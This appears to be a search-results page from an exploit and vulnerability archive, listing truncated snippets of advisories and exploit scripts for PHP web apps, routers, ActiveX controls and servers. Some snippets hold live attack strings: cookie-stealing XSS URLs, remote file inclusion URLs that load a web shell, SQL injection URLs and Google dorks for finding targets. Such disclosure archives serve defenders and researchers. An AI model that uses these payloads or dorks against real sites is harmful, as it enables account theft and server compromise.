47153 matches found
Vulnerability in coWiki
Hello 3APA3A! I am reporting a Cross-Site Scripting vulnerability I found in coWiki. XSS: The vulnerability is in the main script, in the q parameter. http://site/?cmd=srchdoc&q=223E3Cscript3Ealertdocument.cookie3C/script3E Additional information about this vulnerability is on my site:...
Ahhp(php)-Portal Remote File Inclusion
Ahhp-Portal Remote File Inclusion SITE:www.ahhope.org Demo:http://xinan.ahtcm.edu.cn Demo2http://www.hfspaq.gov.cn Vul Code: ? if $sc=='' include$fp.".php"; else include$sc."/".$fp.".php"; ? ------------------------------------------------ example: http://site/page.php?fp=r57shell?...
Step-by-step instructions for debugging Cisco IOS using gdb
Step-by-step instructions for debugging IOS using gdb - Andy Davis, 2008 iosftpexploit "at" googlemail dot com: I have been asked by many people for a simple step-by-step guide for setting up an IOS exploit development environment, which includes connecting to a Cisco router using gdb, so here...
PulseAudio local race condition privilege escalation vulnerability
------------------------------------------------------------------------ PulseAudio local race condition privilege escalation vulnerability ------------------------------------------------------------------------ Yorick Koster, June 2009...
glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
?php / glFusion = 1.1.2 COMapplyFilter/cookies remote blind sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: "Page created in" "seconds by glFusion" +RSS Found another vector of injection in...
Vulnerabilities in many popular engines due to incorrect behavior of PHP file functions
The vulnerability is present, for example, in such popular forums as phpBB and punBB; successful exploitation occurs when the avatar upload path is substituted and an avatar containing PHP code, for example in the EXIF header, is uploaded. CODE: copy'1.jpg', "./dirforupload/1.php0"."/2.jpg"; or copy'1.jpg',...
SEC Consult SA-20111230-0 :: Critical authentication bypass in Microsoft ASP.NET Forms - CVE-2011-3416
SEC Consult Vulnerability Lab Security Advisory 20111230-0 ======================================================================= title: Microsoft ASP.NET Forms Authentication Bypass product: Microsoft .NET Framework vulnerable version: Microsoft .NET Framework Version:4.0.30319; ASP.NET...
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
-------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo -------------------------------------------------------------------------------- our site:...
Hacking AJAX DWR Applications
By Guy Karlebach & Amichai Shulman Introduction The introduction of AJAX into a web application improves the user experience significantly. However, the complexity of some AJAX frameworks and the limited field experience with them requires a careful examination of potential vulnerabilities. DWR i...
Multiple vulnerabilities in WoltLab Burning Book <=1.1.2
Vendor site: woltlab.de. Version 1.1.2 is vulnerable, and possibly earlier ones. The vulnerability is critical. The engine's addentry.php file contains the code: whilelist$key,$val=each$POST $$key=$val; data passed via the POST method is not validated, as a result of which it is possible to replace global...
PHP XSS exploit in phpinfo()
PHP XSS exploit in phpinfo by Silent Needle A: BACKGROUNDfrom php.net int phpinfo int what Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment if compiled ...
Simple Machines Forum "SMF Shoutbox" Mod Persistent XSS
Simple Machines Forum "SMF Shoutbox" Mod 1.16b-1.14 Reference: http://custom.simplemachines.org/mods/index.php?mod=412 Bug:Persistent XSS SMF Shoutbox is a popular shoutbox mod for Simple Machines Forum.The content of a post variable used to hold the user shout is stored in the database and then...
En: ubb hole
----- Original Message ----- From: tdf To: [email protected] Sent: Monday, November 20, 2000 2:46 PM Subject: ubb hole ----------------------------------------------------------------------------------- Ultimate Bulletin Board - Private forums security hole, by tdf [email protected]...
contentserv 4.x
ContentServ again still features remote reading of arbitrary files ==================================================================== ContentServ is a cms and "cross media publishing" software. Let me quote from their website: "At ContentServ, there is always something happening. We continously...
CORE-2008-0123: Leopard Server Remote Path Traversal
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Leopard Server Remote Path Traversal Advisory Information Title: Leopard Server Remote Path Traversal Advisory ID: CORE-2008-0123 Advisory URL:...
ECI router login bypass
Title: ECI router verification bypass and DoS Date: 24/07/2005 Impact: Log in verification bypass Vendors Status: Not contacted they were mean to me Overview: The B-FOCuS Router 312+ provides users with a reliable and secured ADSL2+ connection to the Internet. The 312+ has a single Ethernet port...
Multiple Remote Vulnerabilities in KISGB
Advisory 15 Title: Multiple Remote Vulnerabilities in KISGB Author: 0ozeuso0 Arturo Z. Contact: [email protected] Website: www.diosdelared.com Date: 22/12/06 Risk: critical Vendor Url: http://sourceforge.net/projects/kisgb, http://ravenphpscripts.com Affected Software: Keep It Simple Guest Boo...
TORNADO Computer Trading CMS - SQL Injection Vulnerability
Document Title: =============== TORNADO Computer Trading CMS - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1489 Release Date: ============= 2015-05-05 Vulnerability Laboratory ID VL-ID: ====================================...
CERN Proxy Server: Cross-Site Scripting Vulnerability
CERN Proxy Server: Cross-Site Scripting Vulnerability ===================================================== Affected: CERN HTTPD 3.0A http://www.w3.org/Daemon/Activity.html Vendor Status: CERN httpd team [email protected] was notified on Aug 10, 2001 but they did not respond. Exploit:...
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
Title: ====== iAuto Mobile Application 2012 - Multiple Web Vulnerabilities Date: ===== 2012-07-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=658 VL-ID: ===== 658 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ===========...
CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
CS-Forum 0.82 ajouter.php Remote File Include Vulnerability Source Code: http://www.comscripts.com/jump.php?action=script&id=643 Vulnerable Code: include"$include/footer.php"; Exploit : http://www.vicTim.com/CS-Forum/ajouter.php?include=shell.txt? Discovered By : Mahmoodali Contact : mahk2000 at...
mysqldumper1.24.4_LFI_XSS_CSRF_PHPEXEC_TRAVERSAL_INFO_DISCLOS
================================================================================================ Vulnerable Software: MySQLDumper Version 1.24.4 Downloaded from: http://sourceforge.net/projects/mysqldumper/files/ MD5 SUM: b62357a0d5bbb43779d16427c30966a1 MySQLDumper1.24.4.zip...
POC & exploit for Apache mod_rewrite off-by-one
Public release date of POC/Exploit: 2006-08-20 Author: Jacobo Avariento Gimeno CVE id: CVE-2006-3747 Bugtraq id: 19204 CERT advisory: VU395412 Severity: high Introduction ---- On July 28 2006 Mark Dowd McAfee Avert Labs reported a vulnerability found in modrewrite apache module to the bugtraq...
ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit
----------------------------------------------------------------------------- - ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit - -= http://colander.altervista.org/advisory/ASPDisc.txt =- ----------------------------------------------------------------------------- -= ASP...
[Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]
/ -061124b- | deV!Lz Clanportal - Arbitrary File Upload | / S Y N O P S I S / =================' - access: remote severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP...
Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit
Hi guys, ref: http://www.milw00rm.com/exploits/5179 !/usr/bin/perl -w Title : Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit Vendor : http://www.encaps.net Download : http://sourceforge.net/projects/encapsnet/files/ Author : ZoRLu / [email protected] Website : milw00rm.com /...
glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit
?php / glFusion = 1.1.2 COMapplyFilter/order sql injection exploit by Nine:Situations:Group::bookoo working against Mysql = 4.1 php.ini independent our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: "Page created in" "seconds by glFusion" +RSS...
abarcar Realty Portal SQL Injection Vulnerability
abarcar Realty Portal SQL Injection Vulnerability SpC-x Credit : SpC-X Site : http://www.Cyber-security.org Code : http://www.target.com/path/content.php?cat=SQL Example : http://www.abarcar.com/content.php?cat=SQL /SpC-x -- Get your free email from http://mymail.bsdmail.com...
Sana Net (viewnews.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Sana Net viewnews.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.sana-net.com/ Persian Gulf 4 Ever! Dork : "inurl:viewnews.php?id=" " " Exploite:...
tikiwiki 1.9.5 mysql password disclosure & xss
/==========================================/ //tikiwiki version 1.9.5 CVS -Sirius- PoC // Product: Tikiwiki // URL: http://tikiwiki.org/ // RISK: critical /==========================================/ there's a critical security bug in tikiwiki version 1.9.5 CVS -Sirius- a anonymous user , can dum...
vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable
-------------------------------------------------------------------------------------- title : vBTube v1.1 - Beta Vbulletin Tube Xss Vulnerable Author : CrackersChild [email protected] Exploit : vBTube.php?do=search&search=scriptalertdocument.cookie/script Dork : inurl:vBTube.php...
iOS applications multiple security vulnerabilities
Multiple applications with remote data access are vulnerable...
Squirrelmail local file inclusion
Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...
[SA17409] Serv-U FTP Server Potential Denial of Service Vulnerability
TITLE: Serv-U FTP Server Potential Denial of Service Vulnerability SECUNIA ADVISORY ID: SA17409 VERIFY ADVISORY: http://secunia.com/advisories/17409/ CRITICAL: Moderately critical IMPACT: DoS WHERE: From remote SOFTWARE: Serv-U FTP Server 6.x http://secunia.com/product/5878/ DESCRIPTION: A...
Web India Solutions CMS 2015 - SQL Injection Vulnerability
Document Title: =============== Web India Solutions CMS 2015 - SQL Injection Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1495 Release Date: ============= 2015-05-13 Vulnerability Laboratory ID VL-ID: ====================================...
Advisories: CSS in PHP Photo Album by John Beatty ver. 1.0
+-----------------------------+ Advisories: CSS in PHP Photo Album by John Beatty ver. 1.0 Author: nimber [email protected] Date: 4.11.2003 +-----------------------------+ Vendor: John Beatty Version: 1.0 and older versions? +-----------------------------+ Problem: There is a danger of performance...
SIPS v0.2.2 Remote File Inclusion Vulnerability
/=============================================================================================================================================== | | o SIPS v0.2.2 Remote File Inclusion Vulnerability | | Software : SIPS v0.2.2 | Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip |...
OpenSSH privilege escalation
Invalid usage of X11 cookies...
CA BrightStor ARCserve Backup r11.5 AddColumn() 0day ActiveX Remote Buffer Overflow Exploit
HTML !-- CA BrightStor ARCserve Backup r11.5 AddColumn 0day ActiveX Remote Buffer Overflow Exploit Bug discovered by Krystian Kloskowski h07 [email protected] Tested on: - CA BrightStor ARCserve Backup r11.5 ftp://ftp.ca.com/priv/trial/BABr11/BABLDr115/BABLDr115.zip - IE 6 - XP SP2 Polish Details:...
Local Root exploit (Fedora Core 4)
Local Root Exploit under Fedora Core 4 stable Advisory Florian Strankowski [email protected] www.bildunxxluecke.de/usr/florian/advisory/advisory-05-048.txt Vulnerable System : This vulnerability affects Fedora Core 4.0 stable with the kernelversion 2.6.11-1.1369FC4 1 Thu Jun 2 22:53:35...
JavaMail SMTP Header Injection via method setSubject [CSNC-2014-001]
COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: JavaMail Vendor: Oracle CSNC ID: CSNC-2014-001 CVD ID: none Subject: SMTP Header Injection via method setSubject Risk: Medium Effect: Remotely exploitable Author: Alexandre Herzog [email protected] Date:...
Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC
tested on IE 6 and IE 7 IE 8 Beta1 is up to urself :P worked well but no shell ! cuz its just a PoC stupid u may do some research and put the shell in the hell, anyway, have fun ------------------------------------ [email protected] ------------------------------------ html head titleNovell...
IE7
!-- securitylab.ir [email protected] -- !DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" HTML xmlns="http://www.w3.org/1999/xhtml" HEAD script function load var e; e=document.getElementsByTagName"STYLE"0; e.outerHTML="1";...
Web Design Sydney (news-item.php?id) (news-item.php?newsid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Web Design Sydney news-item.php?id news-item.php?newsid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.milkdigital.com.au/ Persian Gulf 4 Ever! Dork : "web design sydney...
ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability
------------------------------------------------------------------------------ ArticleBeach Script = 2.0 page Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Author : Zeni Susanto a.k.a Bithedz Date Found : October, 22th 2006...
Remote denial of service in Compex network equipment
Remote denial of service in Compex network equipment Vulnerability class: Remote DOS Description: A remote user can cause a denial of service in Compex network equipment that has the UConfig agent installed and activated, activated by default. The vulnerability is present in the design...
ToutVirtual VirtualIQ Multiple Vulnerabilities
Secure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL: http://www.toutvirtual.com Authors: Alberto Triver...
SEC Consult SA-20130311-0 :: Persistent cross-site scripting in jforum
SEC Consult Vulnerability Lab Security Advisory 20130311-0 ======================================================================= title: Persistent cross-site scripting vulnerability product: jforum vulnerable version: 2.1.9 fixed version: - impact: medium homepage: http://jforum.net/ found:...
CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures 1. Advisory Information Title: WordPress Privileges Unchecked in admin.php and Multip...
ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit
function test var shellcode =...